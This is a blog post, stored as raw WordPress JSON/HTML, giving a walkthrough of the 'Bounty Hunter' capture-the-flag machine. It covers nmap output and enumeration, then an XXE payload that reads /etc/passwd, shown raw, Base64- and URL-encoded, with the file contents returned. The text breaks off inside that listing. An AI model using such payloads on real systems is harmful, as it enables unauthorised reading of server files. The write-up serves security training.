{"id":533,"date":"2021-09-04T12:51:03","date_gmt":"2021-09-04T12:51:03","guid":{"rendered":"https:\/\/www.kylemoffat.ca\/?p=533"},"modified":"2022-02-07T21:05:44","modified_gmt":"2022-02-07T21:05:44","slug":"533","status":"publish","type":"post","link":"https:\/\/www.kylemoffat.ca\/index.php\/533\/","title":{"rendered":"Bounty Hunter"},"content":{"rendered":"<div class=\"fusion-fullwidth fullwidth-box fusion-builder-row-1 fusion-flex-container nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\" style=\"background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;border-width: 0px 0px 0px 0px;border-color:#eae9e9;border-style:solid;\" ><div class=\"fusion-builder-row fusion-row fusion-flex-align-items-flex-start fusion-flex-justify-content-center\" style=\"max-width:104%;margin-left: calc(-4% \/ 2 );margin-right: calc(-4% \/ 2 );\"><div class=\"fusion-layout-column fusion_builder_column fusion-builder-column-0 fusion_builder_column_4_5 4_5 fusion-flex-column\"><div class=\"fusion-column-wrapper fusion-flex-justify-content-flex-start fusion-content-layout-column\" style=\"background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;padding: 0px 0px 0px 5%;\"><div style=\"text-align:center;\"><style>.element-bottomshadow.imageframe-1:before, .element-bottomshadow.imageframe-1:after{-webkit-box-shadow: 0 17px 10px rgba(0,0,0,0.4);box-shadow: 0 17px 10px rgba(0,0,0,0.4);}.awb-image-frame.awb-image-frame-1{ margin-bottom : 15px;}<\/style><div class=\"awb-image-frame awb-image-frame-1 fusion-image-frame-bottomshadow image-frame-shadow-1\"><span class=\" fusion-imageframe imageframe-bottomshadow imageframe-1 element-bottomshadow hover-type-none\"><img decoding=\"async\" width=\"300\" height=\"134\" alt=\"bounty_hunter_logo\" title=\"bounty_hunter_logo\" 
src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/bounty_hunter_logo.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/bounty_hunter_logo-300x134.png\" class=\"lazyload img-responsive wp-image-378\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%27308%27%20height%3D%27138%27%20viewBox%3D%270%200%20308%20138%27%3E%3Crect%20width%3D%27308%27%20height%3D%27138%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/bounty_hunter_logo-200x90.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/bounty_hunter_logo.png 308w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 300px\" \/><\/span><\/div><\/div><div class=\"fusion-separator fusion-full-width-sep\" style=\"align-self: center;margin-left: auto;margin-right: auto;width:100%;\"><div class=\"fusion-separator-border sep-single sep-dashed\" style=\"border-color:#f4ad24;border-top-width:1px;\"><\/div><\/div><style type=\"text\/css\">@media only screen and (max-width:1024px) {.fusion-title.fusion-title-1{margin-top:10px!important; margin-right:0px!important;margin-bottom:31px!important;margin-left:0px!important;}}@media only screen and (max-width:640px) {.fusion-title.fusion-title-1{margin-top:0px!important; margin-right:0px!important;margin-bottom:20px!important; margin-left:0px!important;}}<\/style><div class=\"fusion-title title fusion-title-1 fusion-title-text fusion-title-size-four\" style=\"margin-top:10px;margin-right:0px;margin-bottom:31px;margin-left:0px;\"><div class=\"title-sep-container title-sep-container-left fusion-no-large-visibility fusion-no-medium-visibility fusion-no-small-visibility\"><div class=\"title-sep sep-\" style=\"border-color:#e0dede;\"><\/div><\/div><span class=\"awb-title-spacer fusion-no-large-visibility fusion-no-medium-visibility 
fusion-no-small-visibility\"><\/span><h4 class=\"title-heading-left fusion-responsive-typography-calculated\" style=\"margin:0;--fontSize:18;--minFontSize:18px;line-height:1.5;\">NMAP<\/h4><span class=\"awb-title-spacer\"><\/span><div class=\"title-sep-container title-sep-container-right\"><div class=\"title-sep sep-\" style=\"border-color:#e0dede;\"><\/div><\/div><\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-1 > .CodeMirror, .fusion-syntax-highlighter-1 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-1 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-1 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-1 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_1\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_1\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/txt\">PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)\n|   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)\n|_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))\n|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: 
Apache\/2.4.41 (Ubuntu)\n|_http-title: Bounty Hunters\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/textarea><\/div><style type=\"text\/css\">@media only screen and (max-width:1024px) {.fusion-title.fusion-title-2{margin-top:10px!important; margin-right:0px!important;margin-bottom:31px!important;margin-left:0px!important;}}@media only screen and (max-width:640px) {.fusion-title.fusion-title-2{margin-top:0px!important; margin-right:0px!important;margin-bottom:20px!important; margin-left:0px!important;}}<\/style><div class=\"fusion-title title fusion-title-2 fusion-title-text fusion-title-size-four\" style=\"margin-top:10px;margin-right:0px;margin-bottom:31px;margin-left:0px;\"><div class=\"title-sep-container title-sep-container-left fusion-no-large-visibility fusion-no-medium-visibility fusion-no-small-visibility\"><div class=\"title-sep sep-\" style=\"border-color:#e0dede;\"><\/div><\/div><span class=\"awb-title-spacer fusion-no-large-visibility fusion-no-medium-visibility fusion-no-small-visibility\"><\/span><h4 class=\"title-heading-left fusion-responsive-typography-calculated\" style=\"margin:0;--fontSize:18;--minFontSize:18px;line-height:1.5;\">ENUMERATION<\/h4><span class=\"awb-title-spacer\"><\/span><div class=\"title-sep-container title-sep-container-right\"><div class=\"title-sep sep-\" style=\"border-color:#e0dede;\"><\/div><\/div><\/div><div class=\"fusion-text fusion-text-1\"><p class=\"graf graf--p\">When we first hit the page we are presented with a page that mentions \u201cSecurity Researchers can use Burp\u201d<\/p>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-2 hover-type-none\" style=\"max-width:1300px;\"><img decoding=\"async\" width=\"1024\" height=\"513\" title=\"1\" src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/1-1024x513.png\" alt class=\"img-responsive wp-image-391 disable-lazyload\" 
srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/1-200x100.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/1-400x200.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/1-600x300.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/1-800x401.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/1-1200x601.png 1200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/1.png 1382w\" sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 1024px\" \/><\/span><\/div><div class=\"fusion-text fusion-text-2\" style=\"margin-top:10px;\"><p class=\"graf graf--p\">After some fuzzing and browsing around, we find a directory listing with a handful of files in it, one of which contains some dev notes.<\/p>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-3 hover-type-none\"><img decoding=\"async\" width=\"1024\" height=\"520\" title=\"2\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/2-1.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/2-1-1024x520.png\" alt class=\"lazyload img-responsive wp-image-396\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%271135%27%20height%3D%27576%27%20viewBox%3D%270%200%201135%20576%27%3E%3Crect%20width%3D%271135%27%20height%3D%27576%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/2-1-200x101.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/2-1-400x203.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/2-1-600x304.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/2-1-800x406.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/2-1.png 1135w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 1024px\" 
\/><\/span><\/div><div class=\"fusion-text fusion-text-3\"><p>Dev notes \/ Tasks list (really not helpful here):<\/p>\n<span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">http:\/\/10.129.193.21\/resources\/README.txt<\/span>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-4 hover-type-none\"><img decoding=\"async\" width=\"891\" height=\"276\" title=\"3\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/3.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/3.png\" alt class=\"lazyload img-responsive wp-image-403\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%27891%27%20height%3D%27276%27%20viewBox%3D%270%200%20891%20276%27%3E%3Crect%20width%3D%27891%27%20height%3D%27276%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/3-200x62.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/3-400x124.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/3-600x186.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/3-800x248.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/3.png 891w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 891px\" \/><\/span><\/div><div class=\"fusion-text fusion-text-4\"><p>The <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">bountylog.js<\/span> file indicates that the application may be vulnerable to an XML External Entity (XXE) attack: <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" 
style=\"background-color:#f3f3f3;color:#000000;\">http:\/\/10.129.193.21\/resources\/bountylog.js<\/span><\/p>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-5 hover-type-none\"><img decoding=\"async\" width=\"1024\" height=\"435\" title=\"4\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/4.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/4-1024x435.png\" alt class=\"lazyload img-responsive wp-image-404\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%271135%27%20height%3D%27482%27%20viewBox%3D%270%200%201135%20482%27%3E%3Crect%20width%3D%271135%27%20height%3D%27482%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/4-200x85.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/4-400x170.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/4-600x255.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/4-800x340.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/4.png 1135w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 1024px\" \/><\/span><\/div><div class=\"fusion-separator fusion-full-width-sep\" style=\"align-self: center;margin-left: auto;margin-right: auto;margin-top:10px;width:100%;\"><div class=\"fusion-separator-border sep-single sep-dashed\" style=\"border-color:#f4ad24;border-top-width:1px;\"><\/div><\/div><style type=\"text\/css\">@media only screen and (max-width:1024px) {.fusion-title.fusion-title-3{margin-top:15px!important; margin-right:0px!important;margin-bottom:31px!important;margin-left:0px!important;}}@media only screen and (max-width:640px) {.fusion-title.fusion-title-3{margin-top:0px!important; margin-right:0px!important;margin-bottom:20px!important; margin-left:0px!important;}}<\/style><div 
class=\"fusion-title title fusion-title-3 fusion-title-text fusion-title-size-four\" style=\"margin-top:15px;margin-right:0px;margin-bottom:31px;margin-left:0px;\"><div class=\"title-sep-container title-sep-container-left fusion-no-large-visibility fusion-no-medium-visibility fusion-no-small-visibility\"><div class=\"title-sep sep-\" style=\"border-color:#e0dede;\"><\/div><\/div><span class=\"awb-title-spacer fusion-no-large-visibility fusion-no-medium-visibility fusion-no-small-visibility\"><\/span><h4 class=\"title-heading-left fusion-responsive-typography-calculated\" style=\"margin:0;--fontSize:18;--minFontSize:18px;line-height:1.5;\">USER<\/h4><span class=\"awb-title-spacer\"><\/span><div class=\"title-sep-container title-sep-container-right\"><div class=\"title-sep sep-\" style=\"border-color:#e0dede;\"><\/div><\/div><\/div><div class=\"fusion-text fusion-text-5\"><p>When reviewing the <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">POST<\/span> request made to <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">http:\/\/10.129.193.21\/tracker_diRbPr00f314.php<\/span>, which is sent when clicking the Submit button on <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">http:\/\/10.129.193.21\/log_submit.php<\/span>, we see a data parameter in the request when we intercept it in Burp:<\/p>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-6 hover-type-none\"><img decoding=\"async\" width=\"870\" height=\"349\" title=\"5\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/5.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/5.png\" alt class=\"lazyload img-responsive wp-image-414\" 
srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%27870%27%20height%3D%27349%27%20viewBox%3D%270%200%20870%20349%27%3E%3Crect%20width%3D%27870%27%20height%3D%27349%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/5-200x80.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/5-400x160.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/5-600x241.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/5-800x321.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/5.png 870w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 870px\" \/><\/span><\/div><div class=\"fusion-text fusion-text-6\" style=\"margin-top:10px;\"><p>This looks like Base64, but there is clearly some <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">URL Encoding<\/span> applied as well, hence the <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">%2B<\/span> (a URL-encoded +) at the end of the <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">data<\/span> parameter above. 
Highlight the data, and remove the URL Encoding using <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">Ctrl+Shift-U<\/span> and then decode the base64 from that output using <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">Ctrl+Shift-B<\/span>.<\/p>\n<p>This presents us with:<\/p>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-7 hover-type-none\"><img decoding=\"async\" width=\"759\" height=\"413\" title=\"6\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/6.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/6.png\" alt class=\"lazyload img-responsive wp-image-416\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%27759%27%20height%3D%27413%27%20viewBox%3D%270%200%20759%20413%27%3E%3Crect%20width%3D%27759%27%20height%3D%27413%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/6-200x109.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/6-400x218.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/6-600x326.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/6.png 759w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 759px\" \/><\/span><\/div><div class=\"fusion-text fusion-text-7\" style=\"margin-top:10px;\"><p>Now let\u2019s have a look at how we can utilize an XXE attack against this input! 
Looking at <a href=\"https:\/\/owasp.org\/www-community\/vulnerabilities\/XML_External_Entity_(XXE)_Processing\">https:\/\/owasp.org\/www-community\/vulnerabilities\/XML_External_Entity_(XXE)_Processing<\/a>, we can start from the basic XXE payload shown there.<br \/>\nAs a proof of concept, which we will build on later, we use the following payload. It only returns file contents because the server\u2019s XML parser resolves external entities declared in the submitted DOCTYPE; a parser configured to reject DTDs or external entities would not expand <code>&amp;file;<\/code>:<\/p>\n<\/div><div class=\"fusion-text fusion-text-8\"><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-2 > .CodeMirror, .fusion-syntax-highlighter-2 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-2 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-2 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-2 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_2\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_2\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/html\">data=<?xml version=\"1.0\"?>\n<!DOCTYPE foo [\n\t<!ELEMENT foo ANY >\n\t<!ENTITY file SYSTEM \"file:\/\/\/etc\/passwd\" >]>\n\t<bugreport>\n\t\t<title>`&file;`<\/title>\n\t\t<cwe><\/cwe>\n\t\t<cvss><\/cvss>\n\t\t<reward><\/reward>\n\t<\/bugreport><\/textarea><\/div>\n<\/div><div class=\"fusion-text fusion-text-9\" style=\"margin-top:10px;\"><p>Base64 encoded:<\/p>\n<\/div><div class=\"fusion-text fusion-text-10\"><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-3 > .CodeMirror, 
.fusion-syntax-highlighter-3 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-3 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-3 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-3 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_3\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_3\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/html\">data=PD94bWwgIHZlcnNpb249IjEuMCI\/Pgo8IURPQ1RZUEUgZm9vIFsKICAgPCFFTEVNRU5UIGZvbyBBTlkgPgogICA8IUVOVElUWSBmaWxlIFNZU1RFTSAgImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgPl0+CiAgICAgICAgPGJ1Z3JlcG9ydD4KICAgICAgICA8dGl0bGU+YCZmaWxlO2A8L3RpdGxlPgogICAgICAgIDxjd2U+PC9jd2U+CiAgICAgICAgPGN2c3M+PC9jdnNzPgogICAgICAgIDxyZXdhcmQ+PC9yZXdhcmQ+CiAgICAgICAgPC9idWdyZXBvcnQ+<\/textarea><\/div>\n<\/div><div class=\"fusion-text fusion-text-11\" style=\"margin-top:10px;\"><p>URL encoded:<\/p>\n<\/div><div class=\"fusion-text fusion-text-12\"><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-4 > .CodeMirror, .fusion-syntax-highlighter-4 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-4 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-4 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-4 
fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_4\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_4\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/html\">data=PD94bWwgIHZlcnNpb249IjEuMCI\/Pgo8IURPQ1RZUEUgZm9vIFsKICAgPCFFTEVNRU5UIGZvbyBBTlkgPgogICA8IUVOVElUWSBmaWxlIFNZU1RFTSAgImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgPl0%2bCiAgICAgICAgPGJ1Z3JlcG9ydD4KICAgICAgICA8dGl0bGU%2bYCZmaWxlO2A8L3RpdGxlPgogICAgICAgIDxjd2U%2bPC9jd2U%2bCiAgICAgICAgPGN2c3M%2bPC9jdnNzPgogICAgICAgIDxyZXdhcmQ%2bPC9yZXdhcmQ%2bCiAgICAgICAgPC9idWdyZXBvcnQ%2b<\/textarea><\/div>\n<\/div><div class=\"fusion-text fusion-text-13\" style=\"margin-top:10px;\"><p>Provides us with the <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">\/etc\/passwd<\/span> file in the <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">&lt;title&gt;<\/span> block<\/p>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-8 hover-type-none\"><img decoding=\"async\" width=\"1024\" height=\"473\" title=\"7\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/7.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/7-1024x473.png\" alt class=\"lazyload img-responsive wp-image-420\" 
srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%271738%27%20height%3D%27803%27%20viewBox%3D%270%200%201738%20803%27%3E%3Crect%20width%3D%271738%27%20height%3D%27803%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/7-200x92.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/7-400x185.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/7-600x277.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/7-800x370.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/7-1200x554.png 1200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/7.png 1738w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 1024px\" \/><\/span><\/div><div class=\"fusion-text fusion-text-14\" style=\"margin-top:10px;\"><p><span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">\/etc\/passwd<\/span> :<\/p>\n<\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-5 > .CodeMirror, .fusion-syntax-highlighter-5 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-5 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-5 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-5 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_5\" style=\"font-size:14px;\">Copy to 
Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_5\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/x-sh\">root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting 